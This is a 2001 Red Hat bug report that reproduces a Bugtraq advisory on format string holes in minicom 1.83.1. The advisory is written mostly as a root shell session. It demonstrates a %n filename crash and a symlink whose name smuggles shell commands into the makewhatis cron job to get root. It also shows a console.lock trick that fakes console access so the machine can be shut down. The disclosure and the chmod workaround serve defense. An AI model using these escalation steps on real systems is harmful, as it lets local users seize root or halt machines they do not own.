Bug 39033
| Summary: | minicom exploit | ||
|---|---|---|---|
| Product: | [Retired] Red Hat Linux | Reporter: | Lee Howard <faxguy> |
| Component: | minicom | Assignee: | Mike A. Harris <mharris> |
| Status: | CLOSED DUPLICATE | QA Contact: | David Lawrence <dkl> |
| Severity: | medium | Docs Contact: | |
| Priority: | high | ||
| Version: | 7.0 | ||
| Target Milestone: | --- | ||
| Target Release: | --- | ||
| Hardware: | i386 | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 2001-05-03 21:29:22 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
Approved-By: aleph1 Delivered-To: bugtraq.com Delivered-To: bugtraq X-MASSMAIL: 1.0 X-Originating-IP: [203.109.252.12] Date: Thu, 3 May 2001 13:17:01 -0000 Reply-To: zenith parsec <zenith_parsec> Sender: Bugtraq List <BUGTRAQ> From: zenith parsec <zenith_parsec> Subject: minicom exploit To: BUGTRAQ [This advisory was posted Wed Apr 11 08:06:49 2001 to bugzilla.redhat.com/bugzilla and became inaccessable not long after. (I went to add more information, a couple of days after and had been locked out, so I tried emailing the QAContact this information on Tue Apr 24 , but received no reply. Now being Friday May 4 and nothing being forthcoming with reguards to a fix, I wonder whats taking so long.) ] ############################################ minicom - format string holes since 1997. minicom ROOT exploit. ############################################ zen-parse ############################################ ############################################ SYNOPSIS ############################################ Minicom has multiple format string bugs. - ulog() - werror() Any user who has access to a correctly configured, setgid uucp minicom can potentially gain root access within 24 hrs, or have console access (as determined by PAM) and be able to cause shutdown of the machine immediately. affects: Redhat 7.0, almost definately earlier based on dates in sourcecode comments. May not be a security hole on other distributions. Depends on if its setuid/setgid. Root exploit does exist. (I wrote one last night) ############################################ details ############################################ If minicom -s hasn't been run as root prior, then this exploit will probably not work. Work around: chmod -s /usr/bin/minicom [root@clarity src]# whatis minicom minicom (1) - friendly serial communication program [root@clarity /root]# rpm -qf `which minicom` minicom-1.83.1-4 [root@clarity src]# ll `which minicom` -rwxr-sr-x 1 root uucp 171452 Jan 30 05:54 /usr/bin/minicom* [root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src [root@clarity src]# grep do_log common.c|grep -v "%" common.c: * void do_log(char *) - write a line to the logfile common.c: * 27.10.98 jl converted do_log to use stdarg common.c:void do_log(char *line, ...) common.c:void do_log(char *line, ...) [root@clarity src]# grep do_log updown.c do_log(cmdline); /* jl 22.06.97 */ do_log (trimbuf); do_log(trimbuf); do_log (trimbuf); <should be: do_log("%s",cmdline); /* jl 22.06.97 */ do_log ("%s",trimbuf); do_log("%s",trimbuf); do_log ("%s",trimbuf); and others are spread through the code that I haven't checked, but should probably be fixed.> <updown.c contains the code for the uploading and downloading of files. cmdline contains the command that it executes to upload and download files. Part of the command is of course the filename.> [root@clarity src]# touch ~/%n [root@clarity src]# ll ~/%n -rw-r--r-- 1 root root 0 Apr 11 11:26 /root/%n <Using root to demonstrate problem so i can gdb the sgid program.> [root@clarity src]# gdb minicom GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... (gdb) r Starting program: /usr/bin/minicom minicom: WARNING: please don't run minicom as root when not maintaining it (with the -s switch) since all changes to the configuration will be GLOBAL !. <Screen clears... initializing modem message...> Welcome to minicom 1.83.1 OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n Compiled on Aug 24 2000, 10:09:47. Press CTRL-A Z for help on special keys <press ^A S ,select xmodem, then move the cursor down to %n, press space to tag it and then press return...> (no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x400b7a17 in _IO_vfprintf (s=0x8080a60, format=0xbffff2c0 "/usr/bin/sx -vv %n", ap=0xbffff248) at ../sysdeps/i386/i486/bits/string.h:539 539 ../sysdeps/i386/i486/bits/string.h: No such file or directory. (gdb) q <Ok, big deal. You get gid uucp if you exploit it.> =================================================================== =========================THE IMPORTANT PART======================== =================================================================== [root@clarity src]# cd /var/lock [root@clarity lock]# ls -Flatrck total 20 drwxr-xr-x 19 root root 4096 Apr 5 02:35 ../ drwxrwxr-x 2 root root 4096 Apr 7 12:10 subsys/ drwxr-xr-x 2 root root 4096 Apr 9 13:16 console/ drwxrwxr-x 4 root uucp 4096 Apr 11 11:31 ./ <writable by gid uucp.. ok> [root@clarity lock]# cat /etc/cron.daily/makewhatis.cron #!/bin/bash LOCKFILE=/var/lock/makewhatis.lock # the lockfile is not meant to be perfect, it's just in case the # two makewhatis cron scripts get run close to each other to keep # them from stepping on each other's toes. The worst that will # happen is that they will temporarily corrupt the database... [ -f $LOCKFILE ] && exit 0 trap "rm -f $LOCKFILE" EXIT touch $LOCKFILE makewhatis -u -w exit 0 < The worst that can happen is someone will exploit this lockfile mechanism for root. > [root@clarity lock]# su uucp <or run an exploit against minicom.. the gid is the important part.> sh-2.04$ id uid=10(uucp) gid=14(uucp) groups=14(uucp) sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock sh-2.04$ ls -al total 16 drwxrwxr-x 4 root uucp 4096 Apr 11 11:41 . drwxr-xr-x 19 root root 4096 Apr 5 02:35 .. drwxr-xr-x 2 root root 4096 Apr 9 13:16 console lrwxrwxrwx 1 uucp uucp 91 Apr 11 11:41 makewhatis.lock - > /usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz drwxrwxr-x 2 root root 4096 Apr 7 12:10 subsys <ok... what is happening? checkout /usr/sbin/makewhatis. pipe_cmd = "zcat " filename; if the filename contains shell commands, they will be exectuted. not normally a problem, as what manpages have embedded shell commands? malicious ones, like this. The echo on the end is to prevent it from returning an error from the command. the export PATH=. is because we can't put any / characters in the filename. well that will get you root next time /etc/cron.daily/makewhatos.cron runs. what else ...> sh-2.04$ rm makewhatis.lock sh-2.04$ echo -n uucp>console.lock sh-2.04$ mv console oldconsole sh-2.04$ mkdir console;touch console/uucp <now we are at the console(according to PAM anyway). halt anyone?> ************************************************************************ zen-parse - unemployed computer person. <CV available on demand - Could whoever it was who emailed me about that please email again? Thats not to say any companies who haven't emailed me can't email me this time...> ************************************************************************ Sign up for your FREE E-MAIL account @ Dynamitemail: http://www.dynamitemail.com